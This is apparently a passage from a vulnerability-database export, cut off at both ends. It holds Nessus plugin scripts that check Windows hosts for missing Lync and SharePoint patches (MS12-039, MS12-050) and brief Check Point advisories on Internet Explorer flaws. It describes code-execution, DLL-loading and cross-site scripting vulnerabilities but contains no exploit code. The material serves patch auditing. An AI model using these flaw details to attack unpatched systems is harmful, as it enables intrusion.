hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:53", "description": "The remote Windows host is potentially affected by the following vulnerabilities :\n\n - Multiple code execution vulnerabilities exist in the handling of specially crafted TrueType font files.\n (CVE-2011-3402, CVE-2012-0159)\n\n - An insecure library loading vulnerability exists in the way that Microsoft Lync handles the loading of DLL files. (CVE-2012-1849)\n\n - An HTML sanitization vulnerability exists in the way that HTML is filtered. (CVE-2012-1858)", "cvss3": {}, "published": "2012-06-13T00:00:00", "type": "nessus", "title": "MS12-039: Vulnerabilities in Lync Could Allow Remote Code Execution (2707956)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3402", "CVE-2012-0159", "CVE-2012-1849", "CVE-2012-1858"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:microsoft:office_communicator", "cpe:/a:microsoft:lync"], "id": "SMB_NT_MS12-039.NASL", "href": "https://www.tenable.com/plugins/nessus/59457", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59457);\n script_version(\"1.31\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2011-3402\", \"CVE-2012-0159\", \"CVE-2012-1849\", \"CVE-2012-1858\");\n script_bugtraq_id(50462, 53335, 53831, 53842);\n script_xref(name:\"EDB-ID\", value:\"19777\");\n script_xref(name:\"MSFT\", value:\"MS12-039\");\n script_xref(name:\"MSKB\", value:\"2693282\");\n script_xref(name:\"MSKB\", value:\"2693283\");\n script_xref(name:\"MSKB\", value:\"2696031\");\n script_xref(name:\"MSKB\", value:\"2702444\");\n script_xref(name:\"MSKB\", value:\"2708980\");\n\n script_name(english:\"MS12-039: Vulnerabilities in Lync Could Allow Remote Code Execution (2707956)\");\n script_summary(english:\"Checks version of multiple files\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through Microsoft\nLync.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is potentially affected by the following\nvulnerabilities :\n\n - Multiple code execution vulnerabilities exist in the\n handling of specially crafted TrueType font files.\n (CVE-2011-3402, CVE-2012-0159)\n\n - An insecure library loading vulnerability exists in the\n way that Microsoft Lync handles the loading of DLL\n files. (CVE-2012-1849)\n\n - An HTML sanitization vulnerability exists in the way\n that HTML is filtered. (CVE-2012-1858)\");\n # http://blog.watchfire.com/wfblog/2012/07/tostatichtml-the-second-encounter-cve-2012-1858-html-sanitizing-information-disclosure-introduction-t.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7d49512\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-129/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2012/Aug/58\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-039\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Lync 2010, Lync 2010\nAttendee, Lync 2010 Attendant, and Communicator 2007 R2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/06/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office_communicator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:lync\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nglobal_var bulletin;\n\nfunction get_user_dirs()\n{\n local_var appdir, dirpat, domain, hklm, iter, lcpath, login, pass;\n local_var path, paths, pdir, port, rc, root, share, user, ver;\n\n paths = make_list();\n\n registry_init();\n hklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n pdir = get_registry_value(handle:hklm, item:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\ProfilesDirectory\");\n if (pdir && stridx(tolower(pdir), \"%systemdrive%\") == 0)\n {\n root = get_registry_value(handle:hklm, item:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRoot\");\n if (!isnull(root))\n {\n share = ereg_replace(string:root, pattern:\"^([A-Za-z]):.*\", replace:\"\\1:\");\n pdir = share + substr(pdir, strlen(\"%systemdrive%\"));\n }\n }\n RegCloseKey(handle:hklm);\n close_registry(close:FALSE);\n\n if (!pdir)\n return NULL;\n\n ver = get_kb_item(\"SMB/WindowsVersion\");\n\n share = ereg_replace(string:pdir, pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\");\n dirpat = ereg_replace(string:pdir, pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\\*\");\n\n port = kb_smb_transport();\n if (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);\n login = kb_smb_login();\n pass = kb_smb_password();\n domain = kb_smb_domain();\n\n rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\n if (rc != 1)\n {\n NetUseDel(close:FALSE);\n return NULL;\n }\n\n # 2000 / XP / 2003\n if (ver < 6)\n appdir += \"\\Local Settings\\Application Data\";\n # Vista / 7 / 2008\n else\n appdir += \"\\AppData\\Local\";\n\n paths = make_array();\n iter = FindFirstFile(pattern:dirpat);\n while (!isnull(iter[1]))\n {\n user = iter[1];\n iter = FindNextFile(handle:iter);\n\n if (user == \".\" || user == \"..\")\n continue;\n\n path = pdir + \"\\\" + user + appdir;\n\n lcpath = tolower(path);\n if (isnull(paths[lcpath]))\n paths[lcpath] = path;\n }\n\n NetUseDel(close:FALSE);\n\n return paths;\n}\n\nfunction check_vuln(file, fix, kb, key, min, paths)\n{\n local_var base, hklm, path, result, rc, share;\n\n if (!isnull(key))\n {\n registry_init();\n hklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n base = get_registry_value(handle:hklm, item:key);\n RegCloseKey(handle:hklm);\n close_registry(close:FALSE);\n\n if (isnull(base))\n return FALSE;\n }\n\n if (isnull(paths))\n paths = make_list(\"\");\n\n result = FALSE;\n foreach path (paths)\n {\n path = base + path;\n\n share = ereg_replace(string:path, pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\");\n if (!is_accessible_share(share:share))\n continue;\n\n rc = hotfix_check_fversion(file:file, version:fix, min_version:min, path:path, bulletin:bulletin, kb:kb);\n\n if (rc == HCF_OLDER)\n result = TRUE;\n }\n\n return result;\n}\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS12-039\";\nkbs = make_list(\"2693282\", \"2693283\", \"2696031\", \"2702444\", \"2708980\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\", exit_code:1);\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# Add an extra node to the registry key if needed.\narch = get_kb_item_or_exit(\"SMB/ARCH\", exit_code:1);\nif (arch == \"x64\")\n extra = \"\\Wow6432Node\";\n\n######################################################################\n# Microsoft Communicator 2007 R2\n######################################################################\nvuln = check_vuln(\n key : \"SOFTWARE\\Microsoft\\Communicator\\InstallationDirectory\",\n file : \"Communicator.exe\",\n min : \"3.5.0.0\",\n fix : \"3.5.6907.253\",\n kb : \"2708980\"\n);\n\n######################################################################\n# Microsoft Lync 2010\n######################################################################\nif (!vuln)\n{\n vuln = check_vuln(\n key : \"SOFTWARE\" + extra + \"\\Microsoft\\Communicator\\InstallationDirectory\",\n file : \"Communicator.exe\",\n min : \"4.0.0.0\",\n fix : \"4.0.7577.4098\",\n kb : \"2693282\"\n );\n}\n\n######################################################################\n# Microsoft Lync 2010 Attendant\n######################################################################\nvuln = check_vuln(\n key : \"SOFTWARE\" + extra + \"\\Microsoft\\Attendant\\InstallationDirectory\",\n file : \"AttendantConsole.exe\",\n min : \"4.0.0.0\",\n fix : \"4.0.7577.4098\",\n kb : \"2702444\"\n) || vuln;\n\n######################################################################\n# Microsoft Lync 2010 Attendee (admin-level install)\n######################################################################\nvuln = check_vuln(\n key : \"SOFTWARE\\Microsoft\\AttendeeCommunicator\\InstallationDirectory\",\n file : \"CURes.dll\",\n min : \"4.0.0.0\",\n fix : \"4.0.7577.4098\",\n kb : \"2696031\"\n) || vuln;\n\n######################################################################\n# Microsoft Lync 2010 Attendee (user-level install)\n######################################################################\npaths = get_user_dirs();\n\nif (!isnull(paths))\n{\n vuln = check_vuln(\n paths : paths,\n file : \"\\Microsoft Lync Attendee\\System.dll\",\n min : \"4.0.0.0\",\n fix : \"4.0.60831.0\",\n kb : \"2693283\"\n ) || vuln;\n}\n\n# Disconnect from registry.\nclose_registry();\n\nif (vuln)\n{\n set_kb_item(name:\"www/0/XSS\", value:TRUE);\n\n set_kb_item(name:\"SMB/Missing/\" + bulletin, value:TRUE);\n hotfix_security_hole();\n\n hotfix_check_fversion_end();\n exit(0);\n}\n\nhotfix_check_fversion_end();\nexit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:57", "description": "The versions of InfoPath, Office SharePoint Server, SharePoint Server, Groove Server, Windows SharePoint Services, SharePoint Foundation, or Office Web Apps installed on the remote host are affected by multiple privilege escalation and information disclosure vulnerabilities :\n\n - An information disclosure vulnerability exists in the way that HTML strings are sanitized. An attacker who successfully exploited this vulnerability could perform cross-site scripting attacks and run script in the security context of the logged-on user. (CVE-2012-1858)\n\n - A cross-site scripting and a privilege escalation vulnerability allow attacker-controlled JavaScript to run in the context of the user clicking a link. An anonymous attacker could also potentially issue SharePoint commands in the context of an authenticated user on the site. (CVE-2012-1859)\n\n - An information disclosure vulnerability exists in the way that SharePoint stores search scopes. An attacker could view or tamper with other users' search scopes.\n (CVE-2012-1860)\n\n - A cross-site scripting vulnerability exists that allows attacker-controlled JavaScript to run in the context of the user clicking a link. An anonymous attacker could also potentially issue SharePoint commands in the context of an authenticated user. (CVE-2012-1861)\n\n - A URL redirection vulnerability exists in SharePoint.\n The vulnerability could lead to spoofing and information disclosure and could allow an attacker to redirect a user to an external URL. (CVE-2012-1862)\n\n - A cross-site scripting vulnerability exists that allows attacker-controlled JavaScript to run in the context of the user clicking a link. An anonymous attacker could also potentially issue SharePoint commands in the context of an authenticated user. (CVE-2012-1863).", "cvss3": {}, "published": "2012-07-11T00:00:00", "type": "nessus", "title": "MS12-050: Vulnerabilities in SharePoint Could Allow Elevation of Privilege (2695502)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1858", "CVE-2012-1859", "CVE-2012-1860", "CVE-2012-1861", "CVE-2012-1862", "CVE-2012-1863"], "modified": "2019-12-04T00:00:00", "cpe": ["cpe:/a:microsoft:groove", "cpe:/a:microsoft:infopath", "cpe:/a:microsoft:office_web_apps", "cpe:/a:microsoft:sharepoint_server", "cpe:/a:microsoft:sharepoint_services", "cpe:/a:microsoft:sharepoint_foundation"], "id": "SMB_NT_MS12-050.NASL", "href": "https://www.tenable.com/plugins/nessus/59913", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59913);\n script_version(\"1.26\");\n script_cvs_date(\"Date: 2019/12/04\");\n\n script_cve_id(\n \"CVE-2012-1858\",\n \"CVE-2012-1859\",\n \"CVE-2012-1860\",\n \"CVE-2012-1861\",\n \"CVE-2012-1862\",\n \"CVE-2012-1863\"\n );\n script_bugtraq_id(\n 53842,\n 54312,\n 54313,\n 54314,\n 54315,\n 54316\n );\n script_xref(name:\"EDB-ID\", value:\"19777\");\n script_xref(name:\"MSFT\", value:\"MS12-050\");\n script_xref(name:\"MSKB\", value:\"2553194\");\n script_xref(name:\"MSKB\", value:\"2553322\");\n script_xref(name:\"MSKB\", value:\"2553365\");\n script_xref(name:\"MSKB\", value:\"2553424\");\n script_xref(name:\"MSKB\", value:\"2553431\");\n script_xref(name:\"MSKB\", value:\"2589325\");\n script_xref(name:\"MSKB\", value:\"2596663\");\n script_xref(name:\"MSKB\", value:\"2596666\");\n script_xref(name:\"MSKB\", value:\"2596786\");\n script_xref(name:\"MSKB\", value:\"2596911\");\n script_xref(name:\"MSKB\", value:\"2596942\");\n script_xref(name:\"MSKB\", value:\"2598239\");\n script_xref(name:\"MSKB\", value:\"2760604\");\n\n script_name(english:\"MS12-050: Vulnerabilities in SharePoint Could Allow Elevation of Privilege (2695502)\");\n script_summary(english:\"Checks InfoPath / SharePoint / Groove / Office Web Apps version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple privilege escalation and\ninformation disclosure vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The versions of InfoPath, Office SharePoint Server, SharePoint Server,\nGroove Server, Windows SharePoint Services, SharePoint Foundation, or\nOffice Web Apps installed on the remote host are affected by multiple\nprivilege escalation and information disclosure vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n way that HTML strings are sanitized. An attacker who\n successfully exploited this vulnerability could perform\n cross-site scripting attacks and run script in the\n security context of the logged-on user. (CVE-2012-1858)\n\n - A cross-site scripting and a privilege escalation\n vulnerability allow attacker-controlled JavaScript to\n run in the context of the user clicking a link. An\n anonymous attacker could also potentially issue\n SharePoint commands in the context of an authenticated\n user on the site. (CVE-2012-1859)\n\n - An information disclosure vulnerability exists in the\n way that SharePoint stores search scopes. An attacker\n could view or tamper with other users' search scopes.\n (CVE-2012-1860)\n\n - A cross-site scripting vulnerability exists that allows\n attacker-controlled JavaScript to run in the context of\n the user clicking a link. An anonymous attacker could\n also potentially issue SharePoint commands in the\n context of an authenticated user. (CVE-2012-1861)\n\n - A URL redirection vulnerability exists in SharePoint.\n The vulnerability could lead to spoofing and information\n disclosure and could allow an attacker to redirect a\n user to an external URL. (CVE-2012-1862)\n\n - A cross-site scripting vulnerability exists that allows\n attacker-controlled JavaScript to run in the context of\n the user clicking a link. An anonymous attacker could\n also potentially issue SharePoint commands in the\n context of an authenticated user. (CVE-2012-1863).\");\n # http://blog.watchfire.com/wfblog/2012/07/tostatichtml-the-second-encounter-cve-2012-1858-html-sanitizing-information-disclosure-introduction-t.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7d49512\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-050\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for InfoPath 2007, InfoPath\n2010, Office SharePoint Server 2007, SharePoint Server 2010, Groove\nServer 2010, Windows SharePoint Services 2.0 and 3.0, SharePoint\nFoundation 2010, and Office Web Apps 2010.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1862\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:groove\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:infopath\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office_web_apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_services\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_foundation\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"office_installed.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nglobal_var bulletin, vuln;\n\nfunction get_ver()\n{\n local_var fh, path, rc, share, ver;\n\n path = _FCT_ANON_ARGS[0];\n\n share = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:path);\n\n rc = NetUseAdd(share:share);\n if (rc != 1)\n {\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, share);\n }\n\n ver = NULL;\n path = ereg_replace(string:path, pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\\\");\n\n fh = CreateFile(\n file : path,\n desired_access : GENERIC_READ,\n file_attributes : FILE_ATTRIBUTE_NORMAL,\n share_mode : FILE_SHARE_READ,\n create_disposition : OPEN_EXISTING\n );\n if (!isnull(fh))\n {\n ver = GetFileVersion(handle:fh);\n ver = join(ver, sep:\".\");\n CloseFile(handle:fh);\n }\n\n NetUseDel(close:FALSE);\n\n return ver;\n}\n\nfunction check_vuln(fix, kb, name, path, ver)\n{\n local_var info;\n\n if (isnull(ver))\n ver = get_ver(path);\n\n if (isnull(ver) || ver_compare(ver:ver, fix:fix, strict:FALSE) >= 0)\n return 0;\n\n info =\n '\\n Product : ' + name +\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:kb);\n\n vuln = TRUE;\n}\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS12-050\";\nkbs = make_list(\n 2596666, 2596786, 2553431, 2553322,\n 2596663, 2596942, 2553424, 2553194,\n 2589325, 2596911, 2553365, 2598239, 2760604\n);\nif (get_kb_item(\"Host/patch_management_checks\"))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\", exit_code:1);\n\n# Connect to the registry.\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n# Get path information for SharePoint Server 2007.\nsps_2007_path = get_registry_value(\n handle : hklm,\n item : \"SOFTWARE\\Microsoft\\Office Server\\12.0\\InstallPath\"\n);\n\n# Get path information for SharePoint Server 2010.\nsps_2010_path = get_registry_value(\n handle : hklm,\n item : \"SOFTWARE\\Microsoft\\Office Server\\14.0\\InstallPath\"\n);\n\n# Get path information for SharePoint Services 2.0\nsps_20_path = get_registry_value(\n handle : hklm,\n item : \"SOFTWARE\\Microsoft\\Shared Tools\\Web Server Extensions\\6.0\\Location\"\n);\n\n# Get path information for SharePoint Services 3.0 or SharePoint Foundation 2010.\nforeach ver (make_list(\"12.0\", \"14.0\"))\n{\n spf_2010_path = get_registry_value(\n handle : hklm,\n item : \"SOFTWARE\\Microsoft\\Shared Tools\\Web Server Extensions\\\" + ver + \"\\Location\"\n );\n\n if (spf_2010_path)\n break;\n}\n\n# Get path information for Groove Server 2010.\ngs_2010_path = get_registry_value(\n handle : hklm,\n item : \"SOFTWARE\\Microsoft\\Office Server\\14.0\\Groove\\Groove Relay\\Parameters\\InstallDir\"\n);\n\n# Close connection to registry.\nRegCloseKey(handle:hklm);\nclose_registry(close:FALSE);\n\n# Get path and version information for InfoPath.\nip_installs = get_kb_list(\"SMB/Office/InfoPath/*/ProductPath\");\n\n# Get path information for Windows.\nwindir = hotfix_get_systemroot();\nif (isnull(windir))\n exit(1, \"Failed to determine the location of %windir%.\");\n\n# Get path information for Common Files.\ncommonprogramfiles = hotfix_get_commonfilesdir();\nif (isnull(commonprogramfiles))\n exit(1, \"Failed to determine the location of %commonprogramfiles%.\");\n\n# Get path information for Office Web Apps.\nowa_2010_path = sps_2010_path;\n\nif (!isnull(ip_installs))\n{\n foreach install (keys(ip_installs))\n {\n ip_ver = install - 'SMB/Office/InfoPath/' - '/ProductPath';\n ip_path = ip_installs[install];\n if (ip_path) ip_path = ereg_replace(string:ip_path, pattern:\"(.*)(\\\\[^\\\\]+)$\", replace:\"\\1\");\n\n ######################################################################\n # InfoPath 2007 SP2 / SP3\n #\n # [KB2596666] Infopath.Exe: 12.0.6661.5000\n # [KB2596786] Ipeditor.dll: 12.0.6661.5000\n ######################################################################\n office_sp2007 = get_kb_item(\"SMB/Office/2007/SP\");\n office_sp2010 = get_kb_item(\"SMB/Office/2010/SP\");\n if (ip_ver =~ '^12\\\\.' && (!isnull(office_sp2007) && (office_sp2007 == 2 || office_sp2007 == 3)))\n {\n name = \"InfoPath 2007\";\n\n check_vuln(\n name : name,\n kb : \"2596666\",\n path : ip_path + \"\\Infopath.Exe\",\n fix : \"12.0.6661.5000\"\n );\n\n check_vuln(\n name : name,\n kb : \"2596786\",\n path : ip_path + \"\\Ipeditor.dll\",\n fix : \"12.0.6661.5000\"\n );\n }\n ######################################################################\n # InfoPath 2010 SP0 / SP1\n #\n # [KB2553431] Infopath.Exe: 14.0.6120.5000\n # [KB2553322] Ipeditor.dll: 14.0.6120.5000\n ######################################################################\n else if (ip_ver =~ '^14\\\\.' && (!isnull(office_sp2010) && (office_sp2010 == 0 || office_sp2010 == 1)))\n {\n name = \"InfoPath 2010\";\n\n check_vuln(\n name : name,\n kb : \"2553431\",\n path : ip_path + \"\\Infopath.Exe\",\n fix : \"14.0.6120.5000\"\n );\n\n check_vuln(\n name : name,\n kb : \"2553322\",\n path : ip_path + \"\\Ipeditor.dll\",\n fix : \"14.0.6120.5000\"\n );\n }\n }\n}\n\n######################################################################\n# Office SharePoint Server 2007 SP2 / SP3\n#\n# [KB2596663] Microsoft.SharePoint.Publishing.dll: 12.0.6660.5000\n# [KB2596942] Microsoft.office.excel.webui.dll: 12.0.6661.5000\n######################################################################\nif (sps_2007_path)\n{\n name = \"Office SharePoint Server 2007\";\n\n check_vuln(\n name : name,\n kb : \"2596663\",\n path : sps_2007_path + \"Bin\\Microsoft.SharePoint.Publishing.dll\",\n fix : \"12.0.6660.5000\"\n );\n\n share = ereg_replace(string:windir, pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\");\n rc = NetUseAdd(share:share);\n if (rc != 1)\n {\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, share);\n }\n\n dir = ereg_replace(string:windir, pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\");\n subdir = \"\\assembly\\GAC_MSIL\\Microsoft.Office.Excel.WebUI\\\";\n file = \"\\Microsoft.Office.Excel.WebUI.dll\";\n\n # Check for the DLL in each subdirectory.\n for (\n dh = FindFirstFile(pattern:dir + subdir + \"*\");\n !isnull(dh);\n dh = FindNextFile(handle:dh)\n )\n {\n # Skip non-directories.\n if (dh[2] & FILE_ATTRIBUTE_DIRECTORY == 0)\n continue;\n\n # Skip current and parent directories.\n if (dh[1] == \".\" || dh[1] == \"..\")\n continue;\n\n # Skip anything that doesn't look like the 2007 branch.\n if (dh[1] !~ \"^12\\.\")\n continue;\n\n # Get the version number from the file, if it exists.\n path = dir + subdir + dh[1] + file;\n fh = CreateFile(\n file : path,\n desired_access : GENERIC_READ,\n file_attributes : FILE_ATTRIBUTE_NORMAL,\n share_mode : FILE_SHARE_READ,\n create_disposition : OPEN_EXISTING\n );\n if (isnull(fh))\n continue;\n\n ver = GetFileVersion(handle:fh);\n CloseFile(handle:fh);\n\n check_vuln(\n name : name,\n kb : \"2596942\",\n path : windir + subdir + dh[1] + file,\n ver : join(ver, sep:\".\"),\n fix : \"12.0.6661.5000\"\n );\n }\n\n # Clean up.\n NetUseDel(close:FALSE);\n}\n\n######################################################################\n# SharePoint Server 2010 SP0 / SP1\n#\n# [KB2553424] Microsoft.resourcemanagement.dll: 4.0.2450.47\n# [KB2553194] Ssetupui.dll: 14.0.6120.5000\n######################################################################\nif (sps_2010_path)\n{\n name = \"Office SharePoint Server 2010\";\n\n check_vuln(\n name : name,\n kb : \"2553424\",\n path : sps_2010_path + \"Service\\Microsoft.resourcemanagement.dll\",\n fix : \"4.0.2450.47\"\n );\n\n check_vuln(\n name : name,\n kb : \"2553194\",\n path : commonprogramfiles + \"\\Microsoft Shared\\SERVER14\\Server Setup Controller\\WSS.en-us\\Ssetupui.dll\",\n fix : \"14.0.6120.5000\"\n );\n}\n\n######################################################################\n# Groove Server 2010 SP0 / SP1\n#\n# [KB2589325] Relay.exe: 14.0.6120.5000\n######################################################################\nif (gs_2010_path)\n{\n check_vuln(\n name : \"Groove Server 2010\",\n kb : \"2589325\",\n path : gs_2010_path + \"\\Relay.exe\",\n fix : \"14.0.6120.5000\"\n );\n}\n\n######################################################################\n# SharePoint Services 2.0\n#\n# [KB2760604] Onetutil.dll: 11.0.8346.0\n######################################################################\nif (sps_20_path)\n{\n path = sps_20_path + \"Bin\\Onetutil.dll\";\n ver = get_ver(path);\n\n check_vuln(\n name : \"SharePoint Services 2.0\",\n kb : \"2760604\",\n path : path,\n fix : \"11.0.8346.0\"\n );\n}\n\n######################################################################\n# SharePoint Services 3.0 SP2\n#\n# [KB2596911] Mssrch.dll: 12.0.6660.5000\n#\n#\n# SharePoint Foundation 2010 SP0 / SP1\n#\n# [KB2553365] Mssrch.dll: 14.0.6119.5000\n######################################################################\nif (spf_2010_path)\n{\n path = spf_2010_path + \"Bin\\Mssrch.dll\";\n ver = get_ver(path);\n\n if (ver && ver =~ \"^12\\.\")\n {\n check_vuln(\n name : \"SharePoint Services 3.0\",\n kb : \"2596911\",\n path : path,\n ver : ver,\n fix : \"12.0.6660.5000\"\n );\n }\n else if (ver && ver =~ \"^14\\.\")\n {\n check_vuln(\n name : \"SharePoint Foundation 2010\",\n kb : \"2553365\",\n path : path,\n ver : ver,\n fix : \"14.0.6119.5000\"\n );\n }\n}\n\n######################################################################\n# Office Web Apps 2010 SP0 / SP1\n#\n# [KB2598239] msoserver.dll: 14.0.6120.5000\n######################################################################\nif (owa_2010_path)\n{\n check_vuln(\n name : \"Office Web Apps 2010\",\n kb : \"2598239\",\n path : owa_2010_path + \"WebServices\\ConversionService\\Bin\\Converter\\msoserver.dll\",\n fix : \"14.0.6120.5000\"\n );\n}\n\nhotfix_check_fversion_end();\n\nif (!vuln)\n audit(AUDIT_HOST_NOT, 'affected');\n# Flag the system as vulnerable.\nset_kb_item(name:\"SMB/Missing/\" + bulletin, value:TRUE);\nset_kb_item(name:\"www/0/XSS\", value:TRUE);\nhotfix_security_warning();\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_advisories": [{"lastseen": "2022-11-28T07:12:24", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer.", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer Title Element Change Remote Code Execution (MS12-037; CVE-2012-1877)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-1877"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-256", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T07:09:49", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer.", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer insertRow Remote Code Execution (MS12-037; CVE-2012-1880)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-1880"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-253", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T07:12:07", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer.", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer OnBeforeDeactivate Event Remote 